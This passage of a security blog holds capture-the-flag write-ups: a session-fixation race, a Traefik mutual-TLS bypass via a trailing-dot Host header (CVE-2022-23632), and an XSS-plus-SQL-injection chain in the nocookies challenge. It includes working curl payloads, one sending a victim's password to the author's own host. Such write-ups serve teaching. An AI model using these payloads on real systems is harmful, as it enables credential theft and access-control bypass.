curl 'http://172.17.0.1:10000/bin/report?urlString=http://172.17.0.1:10000/bin/%7f' -i -H 'Cookie: MEMENTO_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4ZDA3NDY5ZC1jMmM5LTRkNzItYWMyYS0xZjRkMTA4YmFjMDAifQ.MtOeLRzaBI_y97M_Pr0eQ56bZwVia2tMGpUspj_NEGg'

{"timestamp":"2023-03-29T14:35:17.546+00:00","status":500,"error":"Internal Server Error","path":"/https/blog.bawolff.net/bin/report"}

curl 'http://172.17.0.1:10000/bin/list' -i

[Repeat a few times to account for multiple threads]

[..]

            <tr class="row">
                <td>
                    <a href="/https/blog.bawolff.net/bin/bcab05e5-2fb6-4b8c-aed5-1a18c5fde4be">bcab05e5-2fb6-4b8c-aed5-1a18c5fde4be</a>
                </td>
            </tr>
[..]


Success! We were able to run the list command getting the results for the previous user without including their cookie.

Translating to a real attack

Initially my plan of attack was:

  • Make the exception be thrown to fix the session. Repeat several times to hit all the threads
  • Report a url
  • Assume the admin bot will make a post to a thread that has the fixed session
  • View the list endpoint using my cookie

This did not work. So I took another look at what the admin bot actually does:

            // post flag as anonymous user
            console.log(origin + "/bin/create");
            await page.goto(origin + "/bin/create");
            await page.type("textarea", FLAG);
            await page.click("button");

            // visit to reported url
            await page.goto(origin + url);

I had originally saw the "// post flag as anonymous user" comment, and assumed that meant that normally it is posted without any cookies. However that is wrong. First the bot makes a GET request to load the form, which sets up the cookies. Thus the flag POST is actually authenticated and not anonymous.

This lead to a new plan of attack:

  • Have the reported url, which the bot goes to after posting the flag trigger the exception
  • The session will now be fixed to whatever was used to POST the flag
  • View the list of notes with no cookie, repeating multiple times until we get the thread with the fixed session that the admin bot used.

Specificly, we'll do:

curl 'http://176.17.0.1:10000/bin/report?urlString=http://176.17.0.1:10000/bin/report%253furlString=http://176.17.0.1:10000/bin/%257f'

followed by a bunch of

curl 'http://34.84.65.148:31337/bin/list'

Eventually I got the list including the name of the note with the flag, and curled that note.

Success!

Then i tried it on the real server, but kept getting 404 not found from openresty. Eventually I realized there was an additional cookie i needed for the real server. Guess I was pretty tired at that point. Once I fixed that, we succeeded:

LINECTF{d43f859493cc297c18c68ad241ba04de}

Conclusion

This was a fun challenge. One that was very fresh, but also seemed realistic.

I will say to all the PHP haters out there, that this sort of thing could never happen in php ;)


Monday, July 18, 2022

Write up DiceCTF 2022: Flare and stumbling upon a Traefik 0-day (CVE-2022-23632)

 A while back, I participated in DiceCTF. During the contest I was the first person to solve the problem "Flare":

This was pretty exciting. Normally I'm happy just to be able to solve a problem — I'm never first. Even better though, my solution wasn't the intended solution, and I had instead found a 0-day in the load balancing software the contest was using!

The contest was a while ago so this post is severely belated. Nonetheless, given how exciting this all was, I wanted to write it up.

The Problem

The contest problem was short and sweet. You had a flask app behind Cloudflare. If you accessed it with an internal IP address (e.g. 192.168.0.2 or 10.0.0.2), you get the flag. The entire code is just 18 lines, mostly boilerplate:

import os
import ipaddress

from flask import Flask, request
from gevent.pywsgi import WSGIServer

app = Flask(__name__)
flag = os.getenv('FLAG', default='dice{flag}')

@app.route('/')
def index():
    ip = ipaddress.ip_address(request.headers.get('CF-Connecting-IP'))

    if isinstance(ip, ipaddress.IPv4Address) and ip.is_private:
        return flag

    return f'No flag for {format(ip)}'

WSGIServer(('', 8080), app).serve_forever()
  

Avenues of Attack

Simple to understand, but how to attack? The direct approach seems unlikely; The service is behind Cloudflare — if we can trick Cloudflare into thinking we are connecting to a site from an arbitrary IP address, then that would be a very significant vulnerability. If we could actually make a TCP connection to Cloudflare from a IP address that should not be globally routable, then something is seriously wrong with the internet.

Thinking about it, it seems like the following approaches are possible:

  • Hack Cloudflare to send the wrong CF-Connection-IP header (Seems impossible)
  • Use some sort of HTTP smuggling or header normalization issue to send something that flask thinks is a valid CF-Connection-IP header, but Cloudflare doesn't recognize, and hope that when faced with 2 conflicting headers, flask chooses ours instead of Cloudflare's. (Also seems impossible)
  • Find the backend server and connect to it directly, bypassing Cloudflare allowing us to send whatever header we want


 With that in mind, I figured it had to be the third one. After all, this is a challenge, so it must have a solution, hence I figured it's probably neither impossible nor involving a high value vulnerability in a major CDN.

I was wrong of course. The intended solution was sort of a combination of the first possibility which i dismissed as impossible and python having an "interesting" definition of an "internal" IP, which there is no way I ever would have gotten. More on that later.

Trying to Find the Backend

So now that I determined my course of action, I started hunting for the backend server. I tried googling around for snippets from the page to see if any other sites came up in google with the same text. I tried looking at various "dns history" sites that were largely useless. I tried certificate transparency logs, but no. I even tried blindly typing in variations on the challenge's domain name.

The setup for the challenges were as follows: This challenge was on https://flare.mc.ax. The other challenges were all on *.mc.ax. This was the only challenge served by Cloudflare, the rest were served directly by the CTF infrastructure using a single IP address and a wildcard certificate.

With that in mind, I thought, maybe I could connect to the IP serving the other challenges, give the flare.mc.ax SNI and host header, and perhaps I will be directly connected to the backend. So I tried that, as well as the domain fronting version where you give the wrong SNI but the right host header. This did not work. However, to my surprise instead of getting a 404 response, I got a 421 Misdirected Redirect.

421 essentially means you asked for something that this server is not configured to give you, so you should re-check your DNS resolution to make sure you have the right IP address and try again. In HTTP/2, you are allowed to reuse a connection for other domains as long as it served a TLS certificate that would work for the other domain (This is called "Connection coalescing"). However, sometimes that back-fires especially with wildcard certs. Just because a server serves a TLS certificate for *.example.com, doesn't mean it knows how to literally handle everything under example.com since some subdomains might be served by a different server on a different IP. The new error code was created for such cases, to tell the browser it should stop with the connection coalescing, look up the DNS records for the domain name again, and open a separate connection. We needed a new code, because if the server just responded with a 404, the browser wouldn't know if its because the page just doesn't exist, or if its because the connection was inappropriately coalesced.

Looking back, I'm not sure I should have seen this as a sign. After all I was asking for a domain name that this server did not serve but had a correct certificate for, so this was the appropriate HTTP status code to give. However, the uniqueness of the error code and sudden change in behaviour around the domain name I was interested in, made me feel like I was on to something.

So I tried messing around with variations in headers and SNI. I tried silly things like having Host: flare.ac.mx/foo in the hopes that it would maybe confuse one layer, but another layer would strip it off, and get me the site i wanted or something like that.

Why settle for partial qualification? 

Eventually I tried Host: flare.ac.mx. (note the extra dot at the end) with no SNI.

curl 'https://104.196.60.107'  -vk --header 'host: flare.mc.ax.' --http1.1 --header 'CF-Connecting-IP: 127.0.0.1' --header 'X-Forwarded-For: 127.0.0.1' --header 'CF-ray: REDACTED' --header 'CF-IPCountry: CA' --header 'CF-Visitor: {"scheme":"https"}' --header 'CDN-Loop: cloudflare'

It worked.

Wait what?

What does a dot at the end of a domain name even mean?

In DNS, there is the concept of a partially qualified domain name (PQDN), and its opposite, the fully qualified domain name (FQDN). A partially qualified domain name is similar to a relative path - you can setup a default DNS search path in your DNS config (usually set by DHCP) that acts as a default suffix for partially qualified domain names. For example, if your default search path is example.com and you look up the host foo DNS will check foo.example.com.

I imagine this made more sense during the early internet, when it was more a "network of networks", and it was more common that you wanted to look up local resources on your local network.

In DNS, there is the root zone, which is represented by the empty string. This is the top of the DNS tree, which has TLDs like com or net, as its children.

If you add a period to the end of your DNS name, for example foo., this tells the DNS software that it isn't a partially qualified DNS name, but what you actually want, is to look up the foo domain in the root zone. So it does not lookup foo.example.com., but instead just foo..

For the most part, this is an obscure bit of DNS trivia. However, as far as web browsers are concerned, the PQDN example.net and FQDN example.net. are entirely separate domains. The same origin policy treats them differently, cookies set to one do not affect the other (TLS certificates seem to work for both though). In the past, people have used this trick to avoid advertisers on some websites.

So why did this work

So at this point, I solved the puzzle, obtained the flag and submitted it. Yay me!
 
But I still wasn't really sure what happened. I assumed there was some sort of misconfiguration involved, but I wasn't sure what. I did not have the configuration of the load-balancer. For that matter, I wasn't even sure yet which load balancing software was in use.

After I solved the problem, the competition organizers reached out and asked me what method I use. I imagine they wanted to see if I found the intended solution or stumbled upon something else. When I told them, they were very surprised. Apparently mutual TLS had been set up with cloudflare, and it should have been impossible to contact the backend if you did not have the correct client certificate, which I did not.

Wait what!?

The load balancing software in question was Traefik. In it, you can configure various requirements for different hosts. For example, you can say that a certain host needs a specific version of TLS, specific ciphers, specific server certificate or even a specific client certificate (mTLS). There is also a section for default options. In this case, they had one set of TLS settings for most of the domains, and a rule for the flare domain that you needed the correct client certificate to get access.

In normal operation, the SNI is checked and the appropriate requirements are applied. In the event that the SNI doesn't match the host header, and the host header matches a domain with different TLS requirements then the default requirements, a 421 status code is sent. This is all good.

However, if the host header has a period at the end to make it a FQDN, the code checking the TLS requirements doesn't think it matches the non-period version, so only the default requirements apply. However the rest of the code will still forward the request to the correct domain and process it as normal.

Thus, you can bypass any domain specific security requirements by not sending the SNI and adding an extra period to the host header.

This would be one thing for settings like min TLS version. However, it is an entirely different thing for access control settings such as mutual TLS as it allows an attacker to fully bypass the required client certificate, getting access to things they shouldn't be able to.

I reported this to the Traefik maintainers, and they fixed the issue in version 2.6.1. It was assigned CVE-2022-23632 and you can read more about it in their advisory. This was pretty exciting as well, as Traefik is used by quite a few people, and based on their github security advisory page, this is the first high-severity vulnerability that has been found in it.

What was the intended solution?

I found out later from the organizers of the CTF, that the intended solution was something very different. I definitely would never have came up with this myself.

The intended solution was to exploit two weird behaviours:

  • The python ipaddress library considers class E IP addresses (i.e. 240.0.0.0/4) to be "private". Class E addresses are reserved for future use. They are not globally routable, but they aren't private either, so it is odd that python considers them private. Python's own docs say that is_private is "True if the address is allocated for private networks" linking to IANA's official list, even though 240.0.0.0/4 is not listed as private use on that list.
  • Cloudflare has a feature where if your site does not support IPv6, you can enable "Pseudo IPv4", where the ipv6 connections will be forwarded as if they come from a class E IPv4 address. Cloudflare talks more about it in their blog post.

Which is a pretty fascinating combination.

Initially I discarded the possibility you could make Cloudflare give the wrong IP address, because I thought that would be such a major hack, that it wouldn't show up in this type of contest; people would either be reporting it or exploiting it, depending on the colour of their hat. However, my assumption was based on the idea that any sort of exploit would let you pick your IP. Being able to present as a random class E (which class E IP is based on an md5 hash of the top 64 bits of your IPv6 address, so you cannot choose it), is no where near as useful as being able to chose your IP (Everyone is just so trusting of 127.0.0.1). While this is a fascinating challenge, its hard to imagine a non-contrived situation where this would be a useful primitive. Making network access control in the real world that just blacklists all globally routable IPs instead of your own network seems silly. Even sillier would be to whitelist class E for some reason. Sure I guess an attacker could masquerade as one of these class E addresses to confuse anti-abuse systems, but if the site properly processes those connections, then it seems anti-abuse systems are likely to handle them just as easily as a normal IP. Since its still tied to your real IP, you can't hop between them unless you can hop between real IPs. If it ever really became an issue, Cloudflare lets you disable them, and there is also an additional header with the original IPv6 address you can use. At worst, maybe it makes reading logs after an incident more complicated, but this would be a really bad way to hide yourself in a world where VPNs are cheap and tor is free. In conclusion - its a fascinating behaviour, but practically speaking doesn't seem exploitable in the way that "make Cloudflare report your ip is something other than your ip" sounds like it would be exploitable at first glance.

 

 

Tuesday, February 8, 2022

Write up for DiceCTF 2022: nocookies

Last weekend I participated in DiceCTF. There was some very interesting challenges and I had a lot of fun. Here is a write-up for one of the challenges I solved.

For this challenge, we're presented with a note-keeping app. It allows storing either plaintext or markdown notes. The main distinction is instead of using cookies, it just asks you for a password on every page load.

The admin bot

The challenge also includes an admin bot, that you can give urls to, to visit. Here is a snippet from its code:

    // make an account
    const username = Array(32)
      .fill('')
      .map(() => Math.floor(Math.random() * 16).toString(16))
      .join('');
    const password = flag;

    const firstLogin = doLogin(username, password);

    try {
      page.goto(`https://no-cookies-${instance}.mc.ax/register`);
    } catch {}

    await firstLogin;

    await sleep(3000);

    // visit the note and log in
    const secondLogin = doLogin(username, password);

    try {
      page.goto(url);
    } catch {}

    await secondLogin;

As we can see from the bot code. It creates an account with a random username, and the password being the flag which we are trying to obtain. Since it first visits one page, and then a second of our choosing, this is a strong hint that the intended solution is some sort of XSS to exfiltrate the password.

The view code

Since I suspected that we were looking for an XSS, and I knew the app supported markdown, a good first place to look was the markdown rendering code. This happened entirely client-side on the view note page. Here is the relevant snippet, with important parts bolded.

<script>
  (() => {
    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

    const promptValid = (text) => {
      let result = prompt(text) ?? '';
      return validate(result) ? result : promptValid(text);
    }

    const username = promptValid('Username:');
    const password = promptValid('Password:');

    const params = new URLSearchParams(window.location.search);

    (async () => {
      const { note, mode, views } = await (await fetch('/view', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          username,
          password,
          id: params.get('id')
        })
      })).json();

      if (!note) {
        alert('Invalid username, password, or note id');
        window.location = '/';
        return;
      }

      let text = note;
      if (mode === 'markdown') {
        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

        text = text.replace(/#\s*([^\n]+)/g, (match, p1) => {
          return `<h1>${p1}</h1>`;
        });
        text = text.replace(/\*\*([^\n]+)\*\*/g, (match, p1) => {
          return `<strong>${p1}</strong>`;
        });
        text = text.replace(/\*([^\n]+)\*/g, (match, p1) => {
          return `<em>${p1}</em>`;
        });
      }

      document.querySelector('.note').innerHTML = text;
      document.querySelector('.views').innerText = views;
    })();
  })();
</script>
 

The first thing I was drawn to was this part:

        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

Which looks for syntax like (Link text)[https://urltolinkto.com] and replaces it with a link. A keen eye would notice that the url is allowed to contain double quotes ("), which don't get escaped. This allows you to make extra attributes on the <a> tag. For example (link text)[http://example.com" class="foo] gets turned into <a href="http://example.com" class="foo">link text</a>. This can be used as an XSS by using html event handlers. For example, (link)[https://example.com" onmouseover="alert`1`]. Will make an alert box if you hover over the link with your mouse.

A lack of user interaction 

However, the admin bot doesn't have a mouse, and doesn't interact with the page. So how do we make the xss trigger? We can't tell it to hover over the link

This took me a little while, because I was testing on firefox, but the admin bot uses chrome, and the behaviour is mildly different. Eventually though, I found out that in chrome you can use the autofocus attribute to force focus to the element, and use an onfocus handler to execute code:

(foo)[http://example.com" autofocus=autofocus onfocus="alert`1`]

This will pop the alert box immediately on page view, including for the admin bot

Problem solved right? Wait...

With that, I had assumed I had solved the problem. All I had to do was read the password variable, and send it off to a webserver I control.

So to check if that would work, first I tried:


(foo)[http://example.com" autofocus=autofocus onfocus="alert(password&#x29;]

Note: The ) had to be escaped as &#x29; because the regex stopped at first ")"

...and got a pop-up saying "undefined". Whoops looking back at the view code, I see that const password, is defined in an anonymous arrow function, and my code is executing outside of it (Since its coming from an HTML event handler) so the password variable is not in scope.

At this point, I got stumped for a little bit.

Looking back at the code, I noticed that it was validating the password a bit weirdly

     const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

It was basically checking that the password has at least 1 character, and does not contain apostrophes or dollar signs. Which is just a bit random. If this was actually important you would do it on the server side. In a CTF, one of the key things to do is look for code that stick out or code that looks like something you wouldn't normally write if writing software. This validate function looked a bit suspicious to me, although to be honest, I only thought that because I was fairly stuck at this point.

 I had a vague memory of early JS having some weird design choices around Regexes. So I decided to read up on RegExp in Javascript. Eventually I found this page https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input which was very relevant to the matter at hand.

 In short, whenever you run a regex in javascript, JS saves the text you ran it on as a static class property, and you can access it later by looking at RegExp.input.

 This is first of all crazy (Thanks JS). However, it seemed perfect for this situation. I assumed that since the password was the last thing .test() was ran on, I could obtain it from RegExp.input

However, there was a problem. All the .replace() calls from the markdown parsing also set RegExp.input overriding the password. It seemed like I was at an impasse.

The app did support plaintext notes, which wouldn't run the problematic .replace() calls. If I could somehow get an XSS in a plaintext note, then I could use the RegExp.input trick

Perhaps the markdown XSS I found was a red herring, and I needed to look elsewhere.

 On to an SQL injection

Looking at the view code, if the note is a plaintext note, then it is inserted directly into the document without any escaping on the client side. All the escaping takes place on the backend at insert time. Lets take a look at the backend code:

 const db = {
  prepare: (query, params) => {
    if (params)
      for (const [key, value] of Object.entries(params)) {
        const clean = value.replace(/['$]/g, '');
        query = query.replaceAll(`:${key}`, `'${clean}'`);
      }
    return query;
  },

[...]
  run: (query, params) => {
    const prepared = db.prepare(query, params);
    console.log( prepared );
    return database.prepare(prepared).run();
  },
};

[...]

  db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)', {
    id,
    username,
    note: note.replace(/[<>]/g, ''),
    mode,
  });

 

 As you can see, at insert, the app strips < and > when inserting a note in the DB. It doesn't seem like there's any way to get an XSS past that filter.

However, the prepare function has a flaw that lets us manipulate how SQL queries are generated in general.

The prepare function replaces keys like :note with their escaped values one at a time. However, it doesn't check whether the parameter value contains a replacement identifier itself. For example, if your username is :note, the SQL query will become messed up after :note gets replaced in the replacement.

As an example, consider how the following query would be prepared:

db.run( 'INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: "12345",
    username: ":note",
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }

Lets run through what would happen when preparing this query.

We start with:


INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)

We replace :id with '12345'

INSERT INTO notes VALUES ('12345', :username, :note, :mode, 0)

We replace :username with ':note'

 INSERT INTO notes VALUES ('12345', ':note', :note, :mode, 0)

We replace :note with ',:mode, 22, 0)-- '

 INSERT INTO notes VALUES ('12345', '', :mode, 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

We replace :mode with '<img src=x onerror="alert(RegExp.input)">'

 INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

Note that -- is the SQL comment character, so the end result is effectively:

  INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0);

 bypassing the XSS filter.

Success

In the end we have inserted a plaintext note containing malicious javascript (Any note that has a mode which is not 'markdown' is considered plaintext).  I visited the page, and I got a pop-up with my password.

Now all we need to do is make a payload that instead of showing the password in an alert box, exfiltrates the password to us.

I pre-registered an account with username ":note" and passwored "password". I then created a note with the following curl command:

$ curl 'https://no-cookies-0ac0b52c95f3abe3.mc.ax/create' -H 'Content-Type: application/json' --data-raw '{"username":":note","password":"password","note":",:mode, 22, 0)-- ","mode":"<img src=x onerror=\"window.location=&quot;https://bawolff.net?&quot;+RegExp.input\">"}'


{"id":"32e8c795bb8b44b74d52d74e261a2942"}

 
 I then input the view url to the admin bot service, waited for the admin bot to visit it and watched my webserver log. Sure enough, I soon saw:

34.139.106.105 - - [06/Feb/2022:08:52:49 +0000] "GET /?dice{curr3nt_st4t3_0f_j4v45cr1pt} HTTP/1.1" 200 5514 "https://no-cookies-0ac0b52c95f3abe3.mc.ax/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4855.0 Safari/537.36" 

Thus the flag is dice{curr3nt_st4t3_0f_j4v45cr1pt} 

 

p.s. I hear that RegExp.input isn't the only possible solution. I definitely was not able to think of something like this, but I heard some teams used a really ingenious solution involving replacing the document.querySelector, JSON.stringify functions and re-calling the inner async anon function so that the attacker controlled replaced JSON.stringify function gets called with the password. Which is an absolutely beautiful exploit.